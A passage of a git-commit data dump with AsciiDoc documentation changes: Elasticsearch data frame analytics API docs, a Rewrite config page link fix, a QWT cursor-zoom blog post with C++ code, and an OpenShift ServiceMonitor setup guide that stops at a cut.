string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=description-dfa]\n\n`dest`::\n(Required, object)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=dest]\n \n`model_memory_limit`::\n(Optional, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=model-memory-limit-dfa]\n \n`source`::\n(object)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=source-put-dfa]\n\n[[ml-put-dfanalytics-example]]\n==== {api-examples-title}\n\n[[ml-put-dfanalytics-example-preprocess]]\n===== Preprocessing actions example\n\nThe following example shows how to limit the scope of the analysis to certain \nfields, specify excluded fields in the destination index, and use a query to \nfilter your data before analysis.\n\n[source,console]\n--------------------------------------------------\nPUT _ml\/data_frame\/analytics\/model-flight-delays-pre\n{\n \"source\": {\n \"index\": [\n \"kibana_sample_data_flights\" <1>\n ],\n \"query\": { <2>\n \"range\": {\n \"DistanceKilometers\": { \n \"gt\": 0\n }\n }\n },\n \"_source\": { <3>\n \"includes\": [],\n \"excludes\": [\n \"FlightDelay\",\n \"FlightDelayType\"\n ]\n }\n },\n \"dest\": { <4>\n \"index\": \"df-flight-delays\",\n \"results_field\": \"ml-results\"\n },\n \"analysis\": {\n \"regression\": {\n \"dependent_variable\": \"FlightDelayMin\",\n \"training_percent\": 90\n }\n },\n \"analyzed_fields\": { <5>\n \"includes\": [],\n \"excludes\": [ \n \"FlightNum\"\n ]\n },\n \"model_memory_limit\": \"100mb\"\n}\n--------------------------------------------------\n\/\/ TEST[skip:setup kibana sample data]\n\n<1> The source index to analyze.\n<2> This query filters out entire documents that will not be present in the \ndestination index.\n<3> The `_source` object defines fields in the dataset that will be included or \nexcluded in the destination index. In this case, `includes` does not specify any \nfields, so the default behavior takes place: all the fields of the source index \nwill included except the ones that are explicitly specified in `excludes`.\n<4> Defines the destination index that contains the results of the analysis and \nthe fields of the source index specified in the `_source` object. Also defines \nthe name of the `results_field`.\n<5> Specifies fields to be included in or excluded from the analysis. This does \nnot affect whether the fields will be present in the destination index, only \naffects whether they are used in the analysis.\n\nIn this example, we can see that all the fields of the source index are included \nin the destination index except `FlightDelay` and `FlightDelayType` because \nthese are defined as excluded fields by the `excludes` parameter of the \n`_source` object. The `FlightNum` field is included in the destination index, \nhowever it is not included in the analysis because it is explicitly specified as \nexcluded field by the `excludes` parameter of the `analyzed_fields` object.\n\n\n[[ml-put-dfanalytics-example-od]]\n===== {oldetection-cap} example\n\nThe following example creates the `loganalytics` {dfanalytics-job}, the analysis \ntype is `outlier_detection`:\n\n[source,console]\n--------------------------------------------------\nPUT _ml\/data_frame\/analytics\/loganalytics\n{\n \"description\": \"Outlier detection on log data\",\n \"source\": {\n \"index\": \"logdata\"\n },\n \"dest\": {\n \"index\": \"logdata_out\"\n },\n \"analysis\": {\n \"outlier_detection\": {\n \"compute_feature_influence\": true,\n \"outlier_fraction\": 0.05,\n \"standardization_enabled\": true\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:setup_logdata]\n\n\nThe API returns the following result:\n\n[source,console-result]\n----\n{\n \"id\": \"loganalytics\",\n \"description\": \"Outlier detection on log data\",\n \"source\": {\n \"index\": [\"logdata\"],\n \"query\": {\n \"match_all\": {}\n }\n },\n \"dest\": {\n \"index\": \"logdata_out\",\n \"results_field\": \"ml\"\n },\n \"analysis\": {\n \"outlier_detection\": {\n \"compute_feature_influence\": true,\n \"outlier_fraction\": 0.05,\n \"standardization_enabled\": true\n }\n },\n \"model_memory_limit\": \"1gb\",\n \"create_time\" : 1562265491319,\n \"version\" : \"8.0.0\",\n \"allow_lazy_start\" : false\n}\n----\n\/\/ TESTRESPONSE[s\/1562265491319\/$body.$_path\/]\n\/\/ TESTRESPONSE[s\/\"version\" : \"8.0.0\"\/\"version\" : $body.version\/]\n\n\n[[ml-put-dfanalytics-example-r]]\n===== {regression-cap} examples\n\nThe following example creates the `house_price_regression_analysis` \n{dfanalytics-job}, the analysis type is `regression`:\n\n[source,console]\n--------------------------------------------------\nPUT _ml\/data_frame\/analytics\/house_price_regression_analysis\n{\n \"source\": {\n \"index\": \"houses_sold_last_10_yrs\"\n },\n \"dest\": {\n \"index\": \"house_price_predictions\"\n },\n \"analysis\": \n {\n \"regression\": {\n \"dependent_variable\": \"price\"\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[skip:TBD]\n\n\nThe API returns the following result:\n\n[source,console-result]\n----\n{\n \"id\" : \"house_price_regression_analysis\",\n \"source\" : {\n \"index\" : [\n \"houses_sold_last_10_yrs\"\n ],\n \"query\" : {\n \"match_all\" : { }\n }\n },\n \"dest\" : {\n \"index\" : \"house_price_predictions\",\n \"results_field\" : \"ml\"\n },\n \"analysis\" : {\n \"regression\" : {\n \"dependent_variable\" : \"price\",\n \"training_percent\" : 100\n }\n },\n \"model_memory_limit\" : \"1gb\",\n \"create_time\" : 1567168659127,\n \"version\" : \"8.0.0\",\n \"allow_lazy_start\" : false\n}\n----\n\/\/ TESTRESPONSE[s\/1567168659127\/$body.$_path\/]\n\/\/ TESTRESPONSE[s\/\"version\": \"8.0.0\"\/\"version\": $body.version\/]\n\n\nThe following example creates a job and specifies a training percent:\n\n[source,console]\n--------------------------------------------------\nPUT _ml\/data_frame\/analytics\/student_performance_mathematics_0.3\n{\n \"source\": {\n \"index\": \"student_performance_mathematics\"\n },\n \"dest\": {\n \"index\":\"student_performance_mathematics_reg\"\n },\n \"analysis\":\n {\n \"regression\": {\n \"dependent_variable\": \"G3\",\n \"training_percent\": 70, <1>\n \"randomize_seed\": 19673948271 <2>\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[skip:TBD]\n\n<1> The `training_percent` defines the percentage of the data set that will be \nused for training the model.\n<2> The `randomize_seed` is the seed used to randomly pick which data is used \nfor training.\n\n\n[[ml-put-dfanalytics-example-c]]\n===== {classification-cap} example\n\nThe following example creates the `loan_classification` {dfanalytics-job}, the \nanalysis type is `classification`:\n\n[source,console]\n--------------------------------------------------\nPUT _ml\/data_frame\/analytics\/loan_classification\n{\n \"source\" : {\n \"index\": \"loan-applicants\"\n },\n \"dest\" : {\n \"index\": \"loan-applicants-classified\"\n },\n \"analysis\" : {\n \"classification\": {\n \"dependent_variable\": \"label\",\n \"training_percent\": 75,\n \"num_top_classes\": 2\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[skip:TBD]\n","old_contents":"[role=\"xpack\"]\n[testenv=\"platinum\"]\n[[put-dfanalytics]]\n=== Create {dfanalytics-jobs} API\n[subs=\"attributes\"]\n++++\n<titleabbrev>Create {dfanalytics-jobs}<\/titleabbrev>\n++++\n\nInstantiates a {dfanalytics-job}.\n\nexperimental[]\n\n[[ml-put-dfanalytics-request]]\n==== {api-request-title}\n\n`PUT _ml\/data_frame\/analytics\/<data_frame_analytics_id>`\n\n\n[[ml-put-dfanalytics-prereq]]\n==== {api-prereq-title}\n\nIf the {es} {security-features} are enabled, you must have the following \nbuilt-in roles and privileges:\n\n* `machine_learning_admin`\n* `kibana_admin` (UI only)\n\n\n* source index: `read`, `view_index_metadata`\n* destination index: `read`, `create_index`, `manage` and `index`\n* cluster: `monitor` (UI only)\n \nFor more information, see <<security-privileges>> and <<built-in-roles>>.\n\n+\n--\nNOTE: It is possible that secondary authorization headers are supplied in the\nrequest. If this is the case, the secondary authorization headers are used\ninstead of the primary headers.\n--\n\n[[ml-put-dfanalytics-desc]]\n==== {api-description-title}\n\nThis API creates a {dfanalytics-job} that performs an analysis on the source \nindex and stores the outcome in a destination index.\n\nThe destination index will be automatically created if it does not exist. The \n`index.number_of_shards` and `index.number_of_replicas` settings of the source \nindex will be copied over the destination index. When the source index matches \nmultiple indices, these settings will be set to the maximum values found in the \nsource indices.\n\nThe mappings of the source indices are also attempted to be copied over\nto the destination index, however, if the mappings of any of the fields don't \nmatch among the source indices, the attempt will fail with an error message.\n\nIf the destination index already exists, then it will be use as is. This makes \nit possible to set up the destination index in advance with custom settings \nand mappings.\n\n[discrete]\n[[ml-hyperparam-optimization]]\n===== Hyperparameter optimization\n\nIf you don't supply {regression} or {classification} parameters, _hyperparameter \noptimization_ occurs, which sets a value for the undefined parameters. The\nstarting point is calculated for data dependent parameters by examining the loss\non the training data. Subject to the size constraint, this operation provides an\nupper bound on the improvement in validation loss.\n\nA fixed number of rounds is used for optimization which depends on the number of \nparameters being optimized. The optimization starts with random search, then \nBayesian optimization is performed that is targeting maximum expected \nimprovement. If you override any parameters by explicitely setting it, the \noptimization calculates the value of the remaining parameters accordingly and \nuses the value you provided for the overridden parameter. The number of rounds \nare reduced respectively. The validation error is estimated in each round by \nusing 4-fold cross validation.\n\n[[ml-put-dfanalytics-path-params]]\n==== {api-path-parms-title}\n\n`<data_frame_analytics_id>`::\n(Required, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=job-id-data-frame-analytics-define]\n\n[role=\"child_attributes\"]\n[[ml-put-dfanalytics-request-body]]\n==== {api-request-body-title}\n\n`allow_lazy_start`::\n(Optional, boolean) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=allow-lazy-start]\n\n\/\/Begin analysis\n`analysis`::\n(Required, object)\nThe analysis configuration, which contains the information necessary to perform\none of the following types of analysis: {classification}, {oldetection}, or\n{regression}.\n+\n.Properties of `analysis`\n[%collapsible%open]\n====\n\/\/Begin classification\n`classification`:::\n(Required^*^, object)\nThe configuration information necessary to perform\n{ml-docs}\/dfa-classification.html[{classification}].\n+\nTIP: Advanced parameters are for fine-tuning {classanalysis}. They are set \nautomatically by <<ml-hyperparam-optimization,hyperparameter optimization>> \nto give minimum validation error. It is highly recommended to use the default \nvalues unless you fully understand the function of these parameters.\n+\n.Properties of `classification`\n[%collapsible%open]\n=====\n`class_assignment_objective`::::\n(Optional, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=class-assignment-objective]\n\n`dependent_variable`::::\n(Required, string)\n+\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=dependent-variable]\n+\nThe data type of the field must be numeric (`integer`, `short`, `long`, `byte`), \ncategorical (`ip`, `keyword`, `text`), or boolean.\n\n`eta`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=eta]\n\n`feature_bag_fraction`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=feature-bag-fraction]\n\n`gamma`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=gamma]\n\n`lambda`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=lambda]\n\n`max_trees`::::\n(Optional, integer) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=max-trees]\n\n`num_top_classes`::::\n(Optional, integer)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=num-top-classes]\n\n`num_top_feature_importance_values`::::\n(Optional, integer)\nAdvanced configuration option. Specifies the maximum number of\n{ml-docs}\/dfa-classification.html#dfa-classification-feature-importance[feature\nimportance] values per document to return. By default, it is zero and no feature importance\ncalculation occurs.\n\n`prediction_field_name`::::\n(Optional, string) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=prediction-field-name]\n\n`randomize_seed`::::\n(Optional, long)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=randomize-seed]\n\n`training_percent`::::\n(Optional, integer)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=training-percent]\n\/\/End classification\n=====\n\/\/Begin outlier_detection\n`outlier_detection`:::\n(Required^*^, object)\nThe configuration information necessary to perform\n{ml-docs}\/dfa-outlier-detection.html[{oldetection}]:\n+\n.Properties of `outlier_detection`\n[%collapsible%open]\n=====\n`compute_feature_influence`::::\n(Optional, boolean) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=compute-feature-influence]\n \n`feature_influence_threshold`:::: \n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=feature-influence-threshold]\n\n`method`::::\n(Optional, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=method]\n \n`n_neighbors`::::\n(Optional, integer)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=n-neighbors]\n \n`outlier_fraction`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=outlier-fraction]\n \n`standardization_enabled`::::\n(Optional, boolean) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=standardization-enabled]\n\/\/End outlier_detection\n=====\n\/\/Begin regression\n`regression`:::\n(Required^*^, object)\nThe configuration information necessary to perform\n{ml-docs}\/dfa-regression.html[{regression}].\n+\nTIP: Advanced parameters are for fine-tuning {reganalysis}. They are set \nautomatically by <<ml-hyperparam-optimization,hyperparameter optimization>> \nto give minimum validation error. It is highly recommended to use the default \nvalues unless you fully understand the function of these parameters.\n+\n.Properties of `regression`\n[%collapsible%open]\n=====\n`dependent_variable`::::\n(Required, string)\n+\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=dependent-variable]\n+\nThe data type of the field must be numeric.\n\n`eta`::::\n(Optional, double)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=eta]\n\n`feature_bag_fraction`::::\n(Optional, double)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=feature-bag-fraction]\n\n`gamma`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=gamma]\n\n`lambda`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=lambda]\n\n`max_trees`::::\n(Optional, integer) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=max-trees]\n\n`num_top_feature_importance_values`::::\n(Optional, integer)\nAdvanced configuration option. Specifies the maximum number of\n{ml-docs}\/dfa-regression.html#dfa-regression-feature-importance[feature importance] \nvalues per document to return. By default, it is zero and no feature importance\ncalculation occurs.\n\n`prediction_field_name`::::\n(Optional, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=prediction-field-name]\n\n`randomize_seed`::::\n(Optional, long)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=randomize-seed]\n\n`training_percent`::::\n(Optional, integer)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=training-percent]\n=====\n\/\/End regression\n====\n\/\/End analysis\n\n\/\/Begin analyzed_fields\n`analyzed_fields`::\n(Optional, object)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=analyzed-fields]\n+\n.Properties of `analyzed_fields`\n[%collapsible%open]\n====\n`excludes`:::\n(Optional, array)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=analyzed-fields-excludes]\n\n`includes`:::\n(Optional, array)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=analyzed-fields-includes]\n\/\/End analyzed_fields\n====\n\n`description`::\n(Optional, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=description-dfa]\n\n`dest`::\n(Required, object)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=dest]\n \n`model_memory_limit`::\n(Optional, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=model-memory-limit-dfa]\n \n`source`::\n(object)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=source-put-dfa]\n\n[[ml-put-dfanalytics-example]]\n==== {api-examples-title}\n\n[[ml-put-dfanalytics-example-preprocess]]\n===== Preprocessing actions example\n\nThe following example shows how to limit the scope of the analysis to certain \nfields, specify excluded fields in the destination index, and use a query to \nfilter your data before analysis.\n\n[source,console]\n--------------------------------------------------\nPUT _ml\/data_frame\/analytics\/model-flight-delays-pre\n{\n \"source\": {\n \"index\": [\n \"kibana_sample_data_flights\" <1>\n ],\n \"query\": { <2>\n \"range\": {\n \"DistanceKilometers\": { \n \"gt\": 0\n }\n }\n },\n \"_source\": { <3>\n \"includes\": [],\n \"excludes\": [\n \"FlightDelay\",\n \"FlightDelayType\"\n ]\n }\n },\n \"dest\": { <4>\n \"index\": \"df-flight-delays\",\n \"results_field\": \"ml-results\"\n },\n \"analysis\": {\n \"regression\": {\n \"dependent_variable\": \"FlightDelayMin\",\n \"training_percent\": 90\n }\n },\n \"analyzed_fields\": { <5>\n \"includes\": [],\n \"excludes\": [ \n \"FlightNum\"\n ]\n },\n \"model_memory_limit\": \"100mb\"\n}\n--------------------------------------------------\n\/\/ TEST[skip:setup kibana sample data]\n\n<1> The source index to analyze.\n<2> This query filters out entire documents that will not be present in the \ndestination index.\n<3> The `_source` object defines fields in the dataset that will be included or \nexcluded in the destination index. In this case, `includes` does not specify any \nfields, so the default behavior takes place: all the fields of the source index \nwill included except the ones that are explicitly specified in `excludes`.\n<4> Defines the destination index that contains the results of the analysis and \nthe fields of the source index specified in the `_source` object. Also defines \nthe name of the `results_field`.\n<5> Specifies fields to be included in or excluded from the analysis. This does \nnot affect whether the fields will be present in the destination index, only \naffects whether they are used in the analysis.\n\nIn this example, we can see that all the fields of the source index are included \nin the destination index except `FlightDelay` and `FlightDelayType` because \nthese are defined as excluded fields by the `excludes` parameter of the \n`_source` object. The `FlightNum` field is included in the destination index, \nhowever it is not included in the analysis because it is explicitly specified as \nexcluded field by the `excludes` parameter of the `analyzed_fields` object.\n\n\n[[ml-put-dfanalytics-example-od]]\n===== {oldetection-cap} example\n\nThe following example creates the `loganalytics` {dfanalytics-job}, the analysis \ntype is `outlier_detection`:\n\n[source,console]\n--------------------------------------------------\nPUT _ml\/data_frame\/analytics\/loganalytics\n{\n \"description\": \"Outlier detection on log data\",\n \"source\": {\n \"index\": \"logdata\"\n },\n \"dest\": {\n \"index\": \"logdata_out\"\n },\n \"analysis\": {\n \"outlier_detection\": {\n \"compute_feature_influence\": true,\n \"outlier_fraction\": 0.05,\n \"standardization_enabled\": true\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:setup_logdata]\n\n\nThe API returns the following result:\n\n[source,console-result]\n----\n{\n \"id\": \"loganalytics\",\n \"description\": \"Outlier detection on log data\",\n \"source\": {\n \"index\": [\"logdata\"],\n \"query\": {\n \"match_all\": {}\n }\n },\n \"dest\": {\n \"index\": \"logdata_out\",\n \"results_field\": \"ml\"\n },\n \"analysis\": {\n \"outlier_detection\": {\n \"compute_feature_influence\": true,\n \"outlier_fraction\": 0.05,\n \"standardization_enabled\": true\n }\n },\n \"model_memory_limit\": \"1gb\",\n \"create_time\" : 1562265491319,\n \"version\" : \"8.0.0\",\n \"allow_lazy_start\" : false\n}\n----\n\/\/ TESTRESPONSE[s\/1562265491319\/$body.$_path\/]\n\/\/ TESTRESPONSE[s\/\"version\" : \"8.0.0\"\/\"version\" : $body.version\/]\n\n\n[[ml-put-dfanalytics-example-r]]\n===== {regression-cap} examples\n\nThe following example creates the `house_price_regression_analysis` \n{dfanalytics-job}, the analysis type is `regression`:\n\n[source,console]\n--------------------------------------------------\nPUT _ml\/data_frame\/analytics\/house_price_regression_analysis\n{\n \"source\": {\n \"index\": \"houses_sold_last_10_yrs\"\n },\n \"dest\": {\n \"index\": \"house_price_predictions\"\n },\n \"analysis\": \n {\n \"regression\": {\n \"dependent_variable\": \"price\"\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[skip:TBD]\n\n\nThe API returns the following result:\n\n[source,console-result]\n----\n{\n \"id\" : \"house_price_regression_analysis\",\n \"source\" : {\n \"index\" : [\n \"houses_sold_last_10_yrs\"\n ],\n \"query\" : {\n \"match_all\" : { }\n }\n },\n \"dest\" : {\n \"index\" : \"house_price_predictions\",\n \"results_field\" : \"ml\"\n },\n \"analysis\" : {\n \"regression\" : {\n \"dependent_variable\" : \"price\",\n \"training_percent\" : 100\n }\n },\n \"model_memory_limit\" : \"1gb\",\n \"create_time\" : 1567168659127,\n \"version\" : \"8.0.0\",\n \"allow_lazy_start\" : false\n}\n----\n\/\/ TESTRESPONSE[s\/1567168659127\/$body.$_path\/]\n\/\/ TESTRESPONSE[s\/\"version\": \"8.0.0\"\/\"version\": $body.version\/]\n\n\nThe following example creates a job and specifies a training percent:\n\n[source,console]\n--------------------------------------------------\nPUT _ml\/data_frame\/analytics\/student_performance_mathematics_0.3\n{\n \"source\": {\n \"index\": \"student_performance_mathematics\"\n },\n \"dest\": {\n \"index\":\"student_performance_mathematics_reg\"\n },\n \"analysis\":\n {\n \"regression\": {\n \"dependent_variable\": \"G3\",\n \"training_percent\": 70, <1>\n \"randomize_seed\": 19673948271 <2>\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[skip:TBD]\n\n<1> The `training_percent` defines the percentage of the data set that will be \nused for training the model.\n<2> The `randomize_seed` is the seed used to randomly pick which data is used \nfor training.\n\n\n[[ml-put-dfanalytics-example-c]]\n===== {classification-cap} example\n\nThe following example creates the `loan_classification` {dfanalytics-job}, the \nanalysis type is `classification`:\n\n[source,console]\n--------------------------------------------------\nPUT _ml\/data_frame\/analytics\/loan_classification\n{\n \"source\" : {\n \"index\": \"loan-applicants\"\n },\n \"dest\" : {\n \"index\": \"loan-applicants-classified\"\n },\n \"analysis\" : {\n \"classification\": {\n \"dependent_variable\": \"label\",\n \"training_percent\": 75,\n \"num_top_classes\": 2\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[skip:TBD]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6fd9862a5851dc601c97794a7e316e34e589cd0d","subject":"fix config link","message":"fix config link\n","repos":"jsight\/rewrite,chkal\/rewrite,ocpsoft\/rewrite,jsight\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,chkal\/rewrite,chkal\/rewrite,ocpsoft\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,jsight\/rewrite","old_file":"documentation\/src\/main\/asciidoc\/configuration\/index.asciidoc","new_file":"documentation\/src\/main\/asciidoc\/configuration\/index.asciidoc","new_contents":"* link:..\/[docs home]\n\nThere are many types of configuration objects in Rewrite. The most basic `True` and `False` are the root of all other objects. Blah blah more stuff here.\n\n\n* True\n* False\n* And\n* Or\n* Not\n* Condition\n* Operation\n","old_contents":"* link:..\/docs[docs home]\n\nThere are many types of configuration objects in Rewrite. The most basic `True` and `False` are the root of all other objects. Blah blah more stuff here.\n\n\n* True\n* False\n* And\n* Or\n* Not\n* Condition\n* Operation\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"76feb09778c99d16560b23c707df7ef40bb8025d","subject":"Update 2016-10-23-Google-maps-zoom-theory-and-example-with-Cqt-QWT.adoc","message":"Update 2016-10-23-Google-maps-zoom-theory-and-example-with-Cqt-QWT.adoc","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2016-10-23-Google-maps-zoom-theory-and-example-with-Cqt-QWT.adoc","new_file":"_posts\/2016-10-23-Google-maps-zoom-theory-and-example-with-Cqt-QWT.adoc","new_contents":"= Google maps zoom theory and example with {C++\/qt ; QWT}\n\n\n===== Theory\n\nRecently I had to set up a zoom on qwt plot, the goal was to get the same zoom as google maps when zooming on some coordinates. \n\nqwt plot example :\n\nimage:qwt_plot.png[qwt plot, 500, 500, align=\"center\"]\n\nOpen maps and test, put your cursor on a city and zoom, all the map will be zoomed but the city will always be under your cursor. \n\nThe solution is easy the main idea is to reset your scales with a factor (ex : 0.9 or 1.1) and to apply a part of the factor by using the position of the cursor in order to get the zoom or unzoom. \n\nWe will assume that the x axis is the horizontal and y the vertical.\nSo if we want to zoom on the point which is at (1, 2.5) [(x, y)] we will\n\n- get the position of our cursor on the widget (x_cursor, y_cursor)\n- define the percentage (x_max, y_max) which are the percentage of the x_cursor position and the x_cursor_max position (size max of the widget) and the same for y_percent with y_cursor and y_cursor_max.\n- we will compute the new x scale with x_percent of the factor on a side and 100 - x_percent of the factor for the other side and do the same for the y scale with y_percent \/ the factor.\n\nAfter processing all of this we will have the x axis scale [0.2, 4] and the y axis scale [0.4, 8.5].\n\n\n==== Code with c++\/qt and qwt library : \n\n\nThis code is based on the *PlotMagnifier::rescale(double factor);* function.\n\n[source,cpp]\n----\nvoid My_PlotMagnifier::rescale_on_cursor(double factor, \/\/ the rescale factor (0.9 or 1.1)\n int x_cursor, \/\/ the x, y position of the cursor\n int y_cursor,\n QSize parent_size) \/\/ the max size of the widget\n{\n QwtPlot* plt = plot();\n\n \/\/ max size of the widget\n float x_cursor_max = parent_size.width();\n float y_cursor_max = parent_size.height();\n\n \/\/ percentage position of the cursor in the widget\n float x_percent = (x_cursor * 100) \/ x_cursor_max;\n float y_percent = (y_cursor * 100) \/ y_cursor_max;\n\n \/\/ will be the new lowerBound and upperBound of the scales\n float delta_1 = 0;\n float delta_2 = 0;\n\n _plotScaleEngine->zoomed(true);\n bool doReplot = false;\n const bool autoReplot = plt->autoReplot();\n plt->setAutoReplot( false );\n\n for ( int axisId = 0; axisId < QwtPlot::axisCnt; axisId++ )\n {\n const QwtScaleDiv &scaleDiv = plt->axisScaleDiv( axisId );\n if ( isAxisEnabled( axisId ) )\n {\n double center = scaleDiv.lowerBound() + scaleDiv.range() \/ 2;\t\/\/ Here we set the center of the scale\n const double width_2 = scaleDiv.range() \/ 2 * factor;\t\t\t\/\/ the width wanted between lowerBound (or upper) and the center\n float interval = (scaleDiv.range() \/ 2) - width_2;\t\t\t\t\/\/ the interval between the old width and the wanted width\n\n if (axisId == 0) \t\t\/\/ y - left\n {\n delta_1 = (center - width_2) + (((100 - y_percent) * interval) \/ 100) - interval;\n delta_2 = (center + width_2) - ((y_percent * interval) \/ 100) + interval;\n }\n else if (axisId == 2) \t\/\/ x - bottom\n {\n delta_1 = (center - width_2) + (((x_percent * interval) \/ 100)) - interval;\n delta_2 = (center + width_2) - (((100 - x_percent) * interval) \/ 100) + interval;\n }\n else\n {\n delta_1 = 0;\n delta_2 = 0;\n }\n plt->setAxisScale(axisId, delta_1, delta_2);\n doReplot = true;\n }\n }\n plt->setAutoReplot( autoReplot );\n if ( doReplot )\n plt->replot();\n}\n\nvoid Gr_PlotMagnifier::widgetWheelEvent(QWheelEvent *WheelEvent)\n{\n _plotScaleEngine->getPlot()->select();\n QSize parent_size = this->parentWidget()->size();\n\n if (WheelEvent->delta() > 0) \t\/\/ unzoom\n rescale_on_cursor(0.9, WheelEvent->x(), WheelEvent->y(), parent_size);\n else \t\t\t\t\t\t\t\/\/ zoom\n rescale_on_cursor(1.1, WheelEvent->x(), WheelEvent->y(), parent_size);\n}\n\n\n\n----\n\n\n\n\n\n\n","old_contents":"= Google maps zoom theory and example with {C++\/qt ; QWT}\n\n\n===== Theory\n\nRecently I had to set up a zoom on qwt plot, the goal was to get the same zoom as google maps when zooming on some coordinates. \n\nqwt plot example :\n\nimage:qwt_plot.png[qwt plot, 500, 500, align=\"center\"]\n\nOpen maps and test, put your cursor on a city and zoom, all the map will be zoomed but the city will always be under your cursor. \n\nThe solution is easy the main idea is to reset your scales with a factor (ex : 0.9 or 1.1) and to apply a part of the factor by using the position of the cursor in order to get the zoom or unzoom. \n\nWe will assume that the x axis is the horizontal and y the vertical.\nSo if we want to zoom on the point which is at (1, 2.5) [(x, y)] we will\n\n- get the position of our cursor on the widget (x_cursor, y_cursor)\n- define the percentage (x_max, y_max) which are the percentage of the x_cursor position and the x_cursor_max position (size max of the widget) and the same for y_percent with y_cursor and y_cursor_max.\n- we will compute the new x scale with x_percent of the factor on a side and 100 - x_percent of the factor for the other side and do the same for the y scale with y_percent \/ the factor.\n\nAfter processing all of this we will have the x axis scale [0.2, 4] and the y axis scale [0.4, 8.5].\n\n\n\n==== Code with c++\/qt and qwt library : \n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"319b232a4b6292ad8921f602c7633772eced2151","subject":"Add link to API docs","message":"Add link to API docs\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/monitoring-setting-up-metrics-collection.adoc","new_file":"modules\/monitoring-setting-up-metrics-collection.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * monitoring\/monitoring-your-own-services.adoc\n\n[id=\"setting-up-metrics-collection_{context}\"]\n= Setting up metrics collection\n\nTo use the metrics exposed by your service, you need to configure OpenShift Monitoring to scrape metrics from the `\/metrics` endpoint. You can do this using a ServiceMonitor, a custom resource definition (CRD) that specifies how a service should be monitored, or a PodMonitor, a CRD that specifies how a pod should be monitored. The former requires a Service object, while the latter does not, allowing Prometheus to directly scrape metrics from the metrics endpoint exposed by a Pod.\n\nThis procedure shows how to create a ServiceMonitor for the service.\n\n.Prerequisites\n\n* Log in as a cluster administrator or a user with the `monitor-crd-edit` role.\n\n.Procedure\n\n. Create a YAML file for the ServiceMonitor configuration. In this example, the file is called `example-app-service-monitor.yaml`.\n\n. Fill the file with the configuration for creating the ServiceMonitor:\n+\n[source,yaml]\n----\napiVersion: monitoring.coreos.com\/v1\nkind: ServiceMonitor\nmetadata:\n labels:\n k8s-app: prometheus-example-monitor\n name: prometheus-example-monitor\n namespace: ns1\nspec:\n endpoints:\n - interval: 30s\n port: web\n scheme: http\n selector:\n matchLabels:\n app: prometheus-example-app\n----\n+\nThis configuration makes OpenShift Monitoring scrape the metrics exposed by the sample service deployed in \"Deploying a sample service\", which includes the single `version` metric.\n\n. Apply the configuration file to the cluster:\n+\n----\n$ oc apply -f example-app-service-monitor.yaml\n----\n+\nIt will take some time to deploy the ServiceMonitor.\n\n. You can check that the ServiceMonitor is running:\n+\n----\n$ oc -n ns1 get servicemonitor\nNAME AGE\nprometheus-example-monitor 81m\n----\n\n.Additional resources\n\nSee the 